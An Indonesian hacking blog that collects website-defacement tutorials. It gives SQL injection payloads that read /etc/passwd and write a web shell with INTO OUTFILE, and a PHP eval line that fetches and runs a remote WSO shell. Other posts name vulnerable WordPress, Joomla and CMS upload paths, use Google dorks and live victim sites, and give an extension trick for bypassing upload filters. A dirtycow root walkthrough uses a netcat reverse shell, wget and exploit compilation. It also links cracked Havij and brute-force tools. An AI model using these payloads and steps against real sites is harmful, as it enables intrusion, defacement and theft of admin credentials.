Codes Xploit: Web Hacking
Showing posts with label Web Hacking. Show all posts
Showing posts with label Web Hacking. Show all posts

Cara install Routersploit di Android menggunakan Termux - No root



Apa itu Routersploit?? Routersploit adalah tools linux yang bisa digunakan untuk exploitasi pada router guna mendapatkan password admin router tersebut tanpa melakukan bruteforce,



Tools ini berjalan pada OS linux tapi kali ini kita akan menjalankanya di android,
Untuk menjalankanya di android kita menggunakan aplikasi tambahan yaitu Termux

Yang belum tau apa itu termux bisa membacanya di

Upload Shell With SQL Injection ( SQL Into OUTFILE)

Family Attack Cyber

Upload Shell With SQL Injection ( SQL Injection Into OUTFILE)

SQL Injection Into OUTFILE Upload shell tanpa mencari login admin...

sempat" menulis lagi di blog hehehe dari pada bosen gak ngapain" mending buat tutor ... sudah jarang masuk di dunia hacking karena sibuk di dunia nyata...

tapi insyaallah saya akan sempat share tutor ...

*Pastikan kalian sudah mengerti deface sql manual kalo belum lihat post sebelumnya

Deface SQL Manual

ohh ya jika kalian butuh tools" kunjungin juga blog pencari receh :'v 

404Hacking

TOols


 kali ini saya pakai bts pentesting lab, karena males cari live target 




SS1

pastikan kalian sudah di posisi seperti ini lalu di angka 3 ganti dengan load_file('/etc/passwd') , localhost:8080/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,load_file('/etc/passwd'),4--+
HEX : load_file(0x2f6574632f706173737764)
jika tidak keluar isi dalam perutnya skip aja bro tapi kalau mau tahu isi usernya bisa lihat di target,com/phpinfo.php
karena gw pakai web kaya gini gak bakal keluar lah ya kampang :'v

lalu sekarang untuk mengupload shellnya jika sudah ketemu user langsung go aja keburu kuota gw habis ye
localhost:8080/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,'Daffa Haxor',4 into outfile 'D:/USBWebserver v8.6/root/btslab/vulnerability/uploads/daffahaxor.php'--+


SS2




 kalo seperti berhasil ya fans... sekarang kita coba buka daffahaxor.php &.... 


SS3

sekarang saya pakai teknik memanggil script & kode seperti ini 

<?php eval("?>".file_get_contents("http://www.w0rms.com/down/wso.txt"));?>
lalu result seperti ini 


SS4

terimah kasih sudah melihat tutor jika ada yang bingung tanya ke FB Daffa Haxor klo gak di bales ya lu chat aja ke fanspage :'v

Deface SQL Manual

Family Attack Cyber


Malam guys, sebenarnya gw udah lama pengen nulis nih tutor sejak abad 16 M , tapi sibuk terus yah sekarang gw nulisnya o_oO ???
Dork kalian bisa cari di mbah google mbah bing atau mbah yandex
Dork : inurl:news.php?id= "crotz"

untuk mengetes keperawanan tambahkan ' string

SS1

terbukti nih web perawan ::::))))))) selanjutnya langsung UNION SELECT , kok di lain ORDER BY dulu ? itu kelamaan :) silahkan kalian UNION SELECT web sampe muncul angka
contoh target.com/news.php?id=-11' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--+

SS2
Nah ada angka 5 Kemudian kita mengecek versi database silahkan tambahkan ke angka yang muncul contoh di saya adalah 5 target.com/news.php?id=-11' UNION ALL SELECT 1,2,3,4,@@version,6,7,8,9,10--+ kalian tambahkan @@version atau version()

SS3

"5.5.53-0ubuntu0.14.04.1-log" kalo ada versi 4 proses lebih sulit kita harus menebak tabel 1 per satu

sekarang untuk memunculkan nama nama tabel silahkan tambahkan "group_concat(table_name)" di angka 5 dan "from+information_schema.tables+where+table_schema=database()" di akhiran contoh liat gambar

SS4

" ' UNION ALL SELECT 1,2,3,4,group_concat(table_name),6,7,8,9,10 from information_schema.tables where table_schema=database()--+ "

Langkah selanjutkan saya ingin melihat isi data user jadi untuk mencari tabel user. untuk melihat isi data user kita keluarkan column tambahkan ini & liat contoh :

SS5

" ' UNION ALL SELECT 1,2,3,4,group_concat(column_name),6,7,8,9,10 from information_schema.columns where table_schema=database()--+"

id_kat,kat,id_kat,kat,no_mou,nm_instansi,masa_b,laporan,id,id_kat,id,no_mou,Nama,perihal,ruang_l,masa_b,tindak_l,id_kat,id,nama_instansi,alamat,no_tlp,email,perihal_ks,ruang_l,kompetensi,komitmen,id,username,password

sekarang kita sudah tahu isi column tabel user yaitu username dan password untuk melihat isi username & password user tersebut lihat contoh :

SS6

Yeeee kita sudah dapat ^_^ sekarang tinggal cari login nya kalo itu kalian pake tool admin finder , ada di blog ini tool nya :) Happy Defacing
Penulis:RadicalHaxor

Deface JCE Remote File Upload Vulnerability


Family Attack CYber


Pagi guys udah lama gak share tutor kali ini sibuk nah untuk mengisi waktu luang gw , mending share tutor & receh :'v

Dork :  inurl:"/index.php?option=com_jce"
kalian bisa cari dork yg lain di google

Download dulu tools JCE 3xploiter : Ikehh (Link Update 10/25/2017)

kalian masukkan dork ke google & search

SS1
gw udah dapet targetnya sekarang kalian buka tools JCE 3xploiter lalu masukkan target

SS2

Lalu kalian klik start, jika berhasil muncul gini KK

SS3

Lalu kalian buka itu web nya & upload shell kalian .
Sekian tutorial kali ini & jika kalian bingung tanyakan ke fanspage kami :)

SS4

Tutorial ditulis : RadicalHaxor

Trik Bypass upload shell Backdoor



Mungkin dari kalian sering menjumpai web target yang sudah mendapatkan admin akses nya tapi gagal upload backdoor, salah satunya karena web target menolak upload file yang berektensi .php , nah disini ada sedikit trik untuk Bypass nya.


Dengan Rename nama Backdoor.
1.Upload shell berekstensi shell.jpg.PhP
Ingat, bukan .php tapi .PhP . Kadang server bingung dan akan di accept sebagai file .jpg

Wordpress Brute Force Python & Perl

kali ini gue bakal share sc wp brute force python and perl script
nah di post an sebelumnya si Hawk_B404 sudah share alat brute force versi gothie 
nah disini w juga rada aneh si make punya gothie :v soalnya pas gue brute ehh ada tulisan 
"Wordpress Nao Foi Detectado" 

nah seperti diatas itu :'v ok disini w punya 2 tools wp brute force ini perl dan python :v seterah elu sih makenya yang mana sesuka hati elu aja heheheheh
ok ini dia penampakan tools yang python

tools ini lumayan cepet buat alat brute force wp :'v tertarik ?  download sadja :P
Download Here  <- link donlod udah 1 paket ama wordlist + commandnya 
yang perl pun sama mudah nya dengan script brute force python 
penampakannya seperti ini :) 

nah kurang lebih penampakannya seperti itu :) tertarik ? langsung comod sadja gan heheheh 
Download Here <- Link donlod udah 1 paket sama wordlist and command
nah itu adalah tools brute force wp versi python dan perl tertarik ? comod aja heheheh short link cuma bit ly :) hormati short link oce w juga nyari receh :) 
ok sekian terima kasih :)

Cara Deface Dengan Wp Themes Qualifire File Upload

ya akhir akhir ini jarang ngepost kwowkokw :'v karena gk ada bahan
akhirnya nemu juga buat jadiin bahan blog wowkowkowk langsung saja 

Dork : 
inurl:"/wp-content/themes/qualifire/ site:th 
inurl:"/wp-content/themes/qualifire/ 
*kembangkan oke

Exploitnya:"/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
*tanpa tanda kutip ya gan :'v 
ciri ciri vuln ? blank page :'v 













karena ini butuh csrf w sediakan csrf onlinenya :) 
csrf online : Click here
oke selanjutnya adalah kita mengexploitasi target 
pertama kalian dorking dulu trus exploit :"v 
ok yang kedua adalah memasukkan target ke csrf nya 


nah isi seperti itu 
URL : url target dengan exploit 
contoh : http://target.com/wpcontent/themes/qualifire/scripts/admin/uploadify/uploadify.php
Post File : isi dengan Filedata

nah klo sudah kita pencet Kunci Target kamu upload shell atau sc
disini gue upload gambar :v 







kalau sudah tinggal pencet 'upload cok' 
kalau berhasil bakal muncul angka 1 seperti punya gue 








nah kalau seperti itu berarti berhasil ter upload 













tuh liat punya saya hehehehe 
akses shell nya ? http://site.com/namashell
masih kurang faham ? tenang ada vidionya kok ;) cekidot 

sekian terima kasih :* 

Cara Deface Jquery File Upload


assalamualaikum wr.wb
sore yang cerah untuk bikin post :'v ,kali ini gua bakal share POC
Jquery File Upload :'v
menurut gue ini cara deface yang paling mudah
tapi kita harus pande pande bypass ext shell nya :'v
ok kita lanjut ke tutorial

Bahan Bahan

-Shell ext :php.fla / php56 /php6 /php2 /php1 /.ndsfx / dll
-dork : Touch Me 
csrf onlen : Mpssh
exploit : http://target.com/[path]/server/php/
 itu aja :'v

Tutorial 

 yang pertama adalah kita dorking bisa lewat google image ato google biasa
klo dorking pake google image ya tinggal pencet images :'v di bawah kolom pencarian
contoh w dorking di google image :
Google Image















ciri ciri vuln ? seperti ini :'v Forbidden ? tinggalkan sadja :'v














ok lanjut ekse go to csrf nya :) trus isi url target
trus post filenya files [] contoh punya saya :
selanjut nya pencet lock target :'v abis itu upload shell klean trus pencet upload gan :'v


selanjutnya kita diredirect ke web tersebut lalu mendapatkan pesan sbb :

nah klo seperti itu berarti shell kita ter upload sekarang kita akses dengan menambahkan /files/namashell
contoh : www.kontok.com/server/php/files/w.php.fla











mudah kan ? masih kurang faham ? tenang ada vidionya kok

jangan lupa ya dilike fp nya :)

sekian terima kasih






 


Cara Deface Dengan SQLI (Havij)

kali ini gua mau share deface dengan sqli with Havij oke sebelumnya gua udah share tools havij ini
sekarang gua mau share cara makenya oke langsung aja

Bahan Bahan 

-Havij Crack nya (download disini gan)
-google dork : (download disini)
-Kesabaran :D

Tutorial 

kita Extrack Havij 1.16 dlu di tempat yang mudah dijangkau contoh Desktop
lalu klik kanan pada havij nya lalu Klik Run as admin












penampakan havij nya gini gan












oke selanjutnya kamu cari target dlu contoh saya ada live target
live : www.labooi.com/page.php?articles=17
exploit : site.com/contoh.php?id=69'
tambahin petik
oke Selanjutnya kita masukin ke havij nya tanpa tanda petik












lihat ss diatas, oke selanjut nya adalah kita klik analyze












kita tunggu ampe statusnya analyze ok selanjutnya adalah kita lihat tabel database nya
pencet tables












setelah itu klik get tables













ok selanjutnya adalah kita nyari column yang berhubungan dengan user admin pencet get columns
 contoh :
     user
     admin
     users
berhubung saya dapetnya web brazil so gue pilih table
engi_utillisateurs












terlihat banyak sangad datanya :'v selanjutnya kita centang apa saja yang digunakan untuk login lalu pencet get data
contoh
email , username , password ,id , dll *use your brain












tuh keliatan kan user dan pw admin
tapi klo masih bentuk md5 kita harus hash dlu
contoh di table password kek gini
fb889735bdeb0f8fc200aad392c6aafa745c9284
nah tinggal kita hash saja di hashkiller.co.uk
selanjutnya tinggal login deh
Add caption














tuh liat punya saya heheh masuk ke dashboard admin
btw klo mentok nyari admin loginnya make admin finder yang saya sudah share
upload shell ? use your brain :)
masih kurang paham ? nih vidionya

segitu aja dari gua :) jangan lupa like fp kami ya ^_^

Wordpress Plugins Mobile Detector Shell Upload



yo :'v dah lama gk ngepos ea ainx gk ada imajinasi buat share tutor :'v
nyari exploit baru di exploit-db nemu juga okwowkowk
langsung aja

Bahan : 

dork : inurl:"/wp-content/plugins/wp-mobile-detector/"
          *kembangkan
bekas defacean kalian
oke langsung ke TKP

TKP

1. Dorking di google :'v pilih satu gan jangan semua :'v
2.nah klo sudah exploit dengan
wp-content/plugins/wp-mobile-detector/resize.php
contoh:http://site.com/wp-content/plugins/wp-mobile-detector/resize.php
3.abis itu kita anuin resize.php nya
contoh :http://site.com/wp-content/plugins/wp-mobile-detector/resize.php?src=site.com/deface.php
*site.com/deface.php nya ganti sama bekas defacean kalian
4.nah klo udah akses deh ^_^
akses ? http://site.com/wp-content/plugins/wp-mobile-detector/cache/shell.php

Demo

http://www.alrashidschool.com/ischool/wp-content/plugins/wp-mobile-detector/cache/h3.html
Kurang Paham ? vidio nya

Cara Deface Roxy File Manager

yu wazzap gaes >:( kali ini gue mao share cara deface dengan Roxy File Manager
yaudah berhubung udah malem yaudah deh langsung aja >:(

dork: intitle:"Roxy File Manager"
         inurl:fileman/uploads/
*kembangkan
ext shell : .php56 .php.fla, .php.xxx , .php5 .php6, .php.xxxjpg , .php.orion , .php.h3ll dll
pertama klean dorking di google :) trus cari target klean
nah abis itu exploit dengan
site.com/path/fileman/index.html <- kurang lebih seperti itu :'v
Live Target ainx : http://canhogiaresaigon.com.vn/quanly/fileman/index.html












abis itu upload shell kalean
Foto saat upload shell














nah klo kek gitu bisa gan sekarang tinggal akses deh
akses ? site.com/path/filemanager/Uploads/shell.php.fla












heheheheheheheheeh mudah kan ? Tinggal tebas aja tuh kwowkowkokwowkokw
oh iya jan lupa Like fp kita ya hehehehehe

Download Havij 1.16 pro Portable Crack

yup :'v kali ini gua mau share tools andalan gua klo maen sqli yaitu Havij :'v
ya sedikit penjelesan tentang havij ini
havij adalah sebuah alat untuk melakukan penetrasi terhadap wesite yang mempunyai vulnerability di
Sql Injection :'v













ini tools karena namanya crack jadi otomatis udah full fiture :'v 
ok deh langsung aja ke link donlodnya :'v 

Download Gan

Lapor Klo link rusak ok ;)

Deface CMS Sitefinity Editor Dialogs Shell Upload

Al-Fath

Deface CMS Sitefinity Editor Dialogs Shell Upload
Dork :
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"
Live Demo : http://www.calstart.org/
Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
TUtor :
Tambahin Exploit Target http://www.calstart.org/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Lalu Pilih Shell lu :)
Sukses Akan Seperti ini :)


Lalu lansung akses shell nyaaa,,,


Sekian & Terimah kasih :) oh, ya jangan lupa follow IG baru gw wkwkwk
https://www.instagram.com/m.daffanajwan/ 
Yang baik tambahin followers gw :v

Tutorial Rooting Server with dirtycow

Yo Wazzap gaes :'v w kali ini mao bagiin tutorial rooting server
mungkin udah bnyk yang tau :'v tapi share aja deh :'v
oh iya sebelum itu baca dulu nih :)
http://familyattackcyber.blogspot.co.id/2017/07/tutorial-back-connect-without-port.html
ok sedikit penjelasan tentang rooting :'v root adalah sebuah proses untuk mengizinkan pengguna ponsel pintar, tablet, dan piranti lain untuk mendapatkan akses tertinggi
yaudah gk usah banyak cincong kuy lach langsung ke kamar :* 

Bahan:

1.Netcat (download disini gan)
2.ngrok (ikeh)
3.localroot dirtycow (yamete kudasai)
4.shell kernel 2016 /2015/2014 kebawah
ok lanjut ke tutorial

Tutorial 

pertama kita lakukan back connect dlu :) 
kita ketikkan ke ngrok nya 
ngrok.exe tcp 123 abis itu ke netcatnya
nc -lnvp 123 
nah ke shell nya isikan server ip sama portnya :) 
SS1yang kedua adalah kita panggil exploitnya dengan mengetik 
wget link localroot yang tadi :) 
SS2
selanjutnya kita compile exploitnya dengan mengetik 
gcc -pthread dirty.c -o dirty -lcrypt
SS3
dan yang selanjut nya adalah kita chmod exploit yang tadi di compile dengan mengetik
chmod +x dirty
SS4

abis itu kita jalankan exploitnya :) 
./dirty dan masukan pasword baru :) 
SS5












nah kita tunggu :) klo udah selesai seperti ss dibawah ini :''v 

SS6

abis itu cek udah ke root apa blom dengan mengetik id firefart
SS7

klo udah ke root abis itu kita anuin tty nya :''v dengan mengetik 
python -c 'import pty;pty.spawn("/bin/sh")' 
abis itu kita login pake command ssh 
ssh firefart@localhost 
trus ketik "yes" 
abis itu masukin password kalian :) 
SS8












kurang lebih seperti di ss :) 
done kita berhasil Rooting :) skarang bebas deh lo mau mass apa ambil vpsnya wkwkwkwkwkwk :'v 
vidionya gan (https://www.youtube.com/watch?v=qIJbI-dZYVg) *ini bukan vidio gua
klo ada kesalahan maaf ya ^_^ maklum gan masih newbie :) 
add fb gue >:( fb gue ( sakata gintoki
ok sekian tenkyuh gan :)